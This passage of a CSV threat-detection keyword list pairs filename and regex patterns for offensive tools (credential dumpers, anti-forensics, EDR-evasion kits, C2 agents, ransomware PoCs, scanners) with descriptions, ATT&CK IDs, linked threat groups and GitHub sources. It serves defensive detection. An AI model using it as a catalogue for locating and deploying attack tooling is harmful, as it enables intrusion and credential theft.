T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7220" "*/Fodetect-hooksx64*",".{0,1000}\/Fodetect\-hooksx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","7221" "*/follina.py*",".{0,1000}\/follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","7222" "*/follow_attacker_commands.py*",".{0,1000}\/follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","7223" "*/Forensia.exe*",".{0,1000}\/Forensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post 
Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7224" "*/Forensia.git*",".{0,1000}\/Forensia\.git.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7225" "*/forensia.pdb*",".{0,1000}\/forensia\.pdb.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7226" "*/Forensia/releases/download/ReleaseX64/*",".{0,1000}\/Forensia\/releases\/download\/ReleaseX64\/.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7227" "*/Forensike.git*",".{0,1000}\/Forensike\.git.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","7228" "*/Forensike.ps1*",".{0,1000}\/Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","7229" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7230" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","7231" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7232" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7233" "*/ForgeCert.git*",".{0,1000}\/ForgeCert\.git.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","7234" "*/forkatz.filters*",".{0,1000}\/forkatz\.filters.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","7235" "*/forkatz.git*",".{0,1000}\/forkatz\.git.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using 
SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","7236" "*/ForkDump.cpp*",".{0,1000}\/ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7237" "*/ForkLib.cpp*",".{0,1000}\/ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7238" "*/ForkPlayground.git*",".{0,1000}\/ForkPlayground\.git.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7239" "*/format:hashcat*",".{0,1000}\/format\:hashcat.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","7240" "*/FormThief.git*",".{0,1000}\/FormThief\.git.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","1","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","7241" "*/forwardedemails.txt*",".{0,1000}\/forwardedemails\.txt.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","7242" "*/FourEye.git*",".{0,1000}\/FourEye\.git.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","7243" "*/fox-info.nse*",".{0,1000}\/fox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7244" "*/fox-it/BloodHound*",".{0,1000}\/fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","7245" "*/Free porn.exe*",".{0,1000}\/Free\sporn\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7246" "*/freelancer-info.nse*",".{0,1000}\/freelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7253" "*/Freeze.rs*",".{0,1000}\/Freeze\.rs.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","7254" "*/freyja.go*",".{0,1000}\/freyja\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","7255" "*/freyja_tcp/*",".{0,1000}\/freyja_tcp\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","7256" "*/fritzone/obfy*",".{0,1000}\/fritzone\/obfy.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","N/A","7","678","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z","7257" "*/frpc.exe*",".{0,1000}\/frpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7269" "*/fruityc2.crt*",".{0,1000}\/fruityc2\.crt.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7273" "*/FruityC2.git*",".{0,1000}\/FruityC2\.git.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7274" "*/fruityc2.key*",".{0,1000}\/fruityc2\.key.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7275" "*/fruityc2.pem*",".{0,1000}\/fruityc2\.pem.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 -
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7276" "*/FruityC2/archive/master.zip*",".{0,1000}\/FruityC2\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7277" "*/FruityC2/releases/*",".{0,1000}\/FruityC2\/releases\/.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7278" "*/FruityC2-Client*",".{0,1000}\/FruityC2\-Client.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7279" "*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 -
T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7280" "*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7281" "*/fscan.git*",".{0,1000}\/fscan\.git.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7282" "*/fscan/releases/download/*",".{0,1000}\/fscan\/releases\/download\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7283" "*/fscan_freebsd_arm64*",".{0,1000}\/fscan_freebsd_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7284" "*/fscan_mac_arm64*",".{0,1000}\/fscan_mac_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7285" "*/fscan32 *",".{0,1000}\/fscan32\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7286" "*/fscan32.exe*",".{0,1000}\/fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7287" "*/fscan386 *",".{0,1000}\/fscan386\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7288" "*/fscan64.exe*",".{0,1000}\/fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7289" "*/fscanamd64 *",".{0,1000}\/fscanamd64\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7290" "*/fscanarm64.exe*",".{0,1000}\/fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7291" "*/fscanarmv6.exe*",".{0,1000}\/fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7292" "*/fscanarmv7.exe*",".{0,1000}\/fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7293" "*/ft-linux-x64 *",".{0,1000}\/ft\-linux\-x64\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#linux","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","7294" "*/ftp-anon.nse*",".{0,1000}\/ftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7295" "*/ftp-bounce.nse*",".{0,1000}\/ftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7296" "*/ftp-brute.nse*",".{0,1000}\/ftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7297" "*/FtpC2/*",".{0,1000}\/FtpC2\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","7298" 